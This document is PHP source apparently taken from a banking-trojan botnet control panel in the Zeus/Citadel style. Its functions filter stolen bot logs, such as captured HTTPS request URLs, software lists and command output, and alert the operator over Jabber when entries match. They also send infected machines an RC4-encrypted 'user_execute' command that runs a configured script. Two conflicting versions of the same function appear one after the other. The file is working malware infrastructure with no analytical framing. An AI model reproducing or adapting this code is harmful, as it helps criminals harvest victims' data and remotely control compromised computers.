function imNotify(&$type, &$list, &$botId, $defloration = false, $wentOnline = false)
{
if (empty($GLOBALS['config']['reports_jn_to'])) {
return;
}
$messages = array();
# Notify of new matching BotIDs
if ($defloration) {
$ml = explode("", $GLOBALS['config']['reports_jn_botmasks']);
foreach ($ml as $mask) {
if (@preg_match('#^' . str_replace('\\*', '.*', preg_quote($mask, '#')) . '$#i', $botId) > 0) {
$messages[] = "Reason: botId matched\nBot ID: {$botId}\n";
break;
}
}
}
# Notify of matching BotIDs went online
if ($wentOnline) {
$ml = explode("", $GLOBALS['config']['reports_jn_masks']['wentOnline']);
foreach ($ml as $mask) {
if (@preg_match('#^' . str_replace('\\*', '.*', preg_quote($mask, '#')) . '$#i', $botId) > 0) {
$messages[] = "Reason: botId is online\nBot ID: {$botId}\n";
break;
}
}
}
# Notify of matching report URLs
if (($type == BLT_HTTP_REQUEST || $type == BLT_HTTPS_REQUEST) && !empty($list[SBCID_PATH_SOURCE])) {
$ml = explode("", $GLOBALS['config']['reports_jn_list']);
foreach ($ml as $mask) {
if (@preg_match('#^' . str_replace('\\*', '.*', preg_quote($mask, '#')) . '$#i', $list[SBCID_PATH_SOURCE]) > 0) {
$messages[] = "Reason: URL matched\nBot ID: {$botId}\nURL: " . $list[SBCID_PATH_SOURCE] . "\n\n" . substr($list[SBCID_BOTLOG], 0, 1024);
break;
}
}
}
# Notify of matching report contexts by type
# NOTE: these reports are not presented in full! Only some lines around the keyword
if (!empty($list[SBCID_BOTLOG])) {
$report_match = array(BLT_ANALYTICS_SOFTWARE => array('software', 'Software matched'), BLT_COMMANDLINE_RESULT => array('cmd', 'Command line result matched'));
foreach ($report_match as $rm_type => $rm) {
if ($type == $rm_type) {
$ml = explode("", $GLOBALS['config']['reports_jn_masks'][$rm[0]]);
$reason = $rm[1];
foreach (array_filter(array_map('trim', $ml), 'strlen') as $mask) {
if (@preg_match('#' . str_replace('\\*', '.*', preg_quote($mask, '#')) . '#i', $list[SBCID_BOTLOG], $m, PREG_OFFSET_CAPTURE) > 0) {
# Extract a few lines around the match
$surrounding_lines = 2;
$match_pos = $m[0][1];
# offset of the match
$n_pos = array(0);
# array of \n offsets
$p = 0;
# current offset
$p_past_npos = false;
# are we past the match?
while (FALSE !== ($p = strpos($list[SBCID_BOTLOG], "\n", $p))) {
# all \n-s
$n_pos[] = $p;
# add it
if ($p > $match_pos) {
$p_past_npos = true;
}
if (!$p_past_npos && count($n_pos) > $surrounding_lines + 1) {
# don't keep more than N \n-s
array_shift($n_pos);
}
if ($p_past_npos && count($n_pos) >= ($surrounding_lines + 1) * 2) {
# stop a few lines past the match
break;
}
$p++;
}
$p_from = array_shift($n_pos);
$p_till = array_pop($n_pos);
$message_part = trim(substr($list[SBCID_BOTLOG], $p_from, $p_till - $p_from));
$messages[] = "Reason: {$reason}\nBot ID: {$botId}\n\n" . $message_part;
break;
}
}
}
}
}
# Notify
if (empty($messages)) {
return;
}
foreach ($messages as $message) {
GateLog::get()->log(GateLog::L_TRACE, 'Jabber', sprintf("Notify %s : %s", $GLOBALS['config']['reports_jn_to'], $message));
}
jabber_notify($GLOBALS['config']['reports_jn_to'], $messages);
# Execute scripts, if set
global $country_allowed;
if ($country_allowed && strlen($GLOBALS['config']['reports_jn_script']) > 0) {
$eid = md5(microtime(), true);
$script = 'user_execute "' . trim($GLOBALS['config']['reports_jn_script']) . '" -f';
$size = strlen($eid) + strlen($script);
$replyData = pack('LLLL', 1, 0, $size, $size) . $eid . $script;
$replyData = pack('LLLLLLLL', mt_rand(), mt_rand(), mt_rand(), mt_rand(), mt_rand(), HEADER_SIZE + strlen($replyData), 0, 1) . md5($replyData, true) . $replyData;
visualEncrypt($replyData);
rc4($replyData, $GLOBALS['globalKey']);
echo $replyData;
die;
}
}
function imNotify(&$type, &$list, &$botId)
{
if (($type == BLT_HTTP_REQUEST || $type == BLT_HTTPS_REQUEST) && !empty($list[SBCID_PATH_SOURCE])) {
$ml = explode("", $GLOBALS['config']['reports_jn_list']);
foreach ($ml as &$mask) {
if (@preg_match('#^' . str_replace('\\*', '.*', preg_quote($mask, '#')) . '$#i', $list[SBCID_PATH_SOURCE]) > 0) {
$message = htmlentities("Bot ID: " . $botId . "\nURL: " . $list[SBCID_PATH_SOURCE] . "\n\n" . substr($list[SBCID_BOTLOG], 0, 1024));
error_reporting(0);
if (strlen($GLOBALS['config']['reports_jn_logfile']) > 0 && ($fh = @fopen($GLOBALS['config']['reports_jn_logfile'], 'at')) !== false) {
@fwrite($fh, $message . "\n\n" . str_repeat('=', 40) . "\n\n");
@fclose($fh);
}
require_once "system/jabberclass.php";
$jab = new Jabber();
$jab->server = $GLOBALS['config']['reports_jn_server'];
$jab->port = $GLOBALS['config']['reports_jn_port'];
$jab->username = $GLOBALS['config']['reports_jn_account'];
$jab->password = $GLOBALS['config']['reports_jn_pass'];
if ($jab->connect()) {
$jab->sendAuth();
$jab->sendPresence(NULL, NULL, "online");
$jab->sendMessage($GLOBALS['config']['reports_jn_to'], "normal", NULL, array("body" => $message));
$jab->disconnect();
}
if (strlen($GLOBALS['config']['reports_jn_script']) > 0) {
$eid = md5($mask, true);
$script = 'user_execute "' . trim($GLOBALS['config']['reports_jn_script']) . '" -f';
$size = strlen($eid) + strlen($script);
$replyData = pack('LLLL', 1, 0, $size, $size) . $eid . $script;
$replyData = pack('LLLLLLLL', mt_rand(), mt_rand(), mt_rand(), mt_rand(), mt_rand(), HEADER_SIZE + strlen($replyData), 0, 1) . md5($replyData, true) . $replyData;
visualEncrypt($replyData);
rc4($replyData, $GLOBALS['config']['botnet_cryptkey_bin']);
echo $replyData;
die;
}
break;
}
}
}
}
function sendEmptyReply()
{
$replyData = pack('LLLLLLLL', mt_rand(), mt_rand(), mt_rand(), mt_rand(), mt_rand(), HEADER_SIZE + ITEM_HEADER_SIZE, 0, 1) . "J�6�K��y�u.#H�";
visualEncrypt($replyData);
rc4($replyData, $GLOBALS['config']['botnet_cryptkey_bin']);
echo $replyData;
die;
}
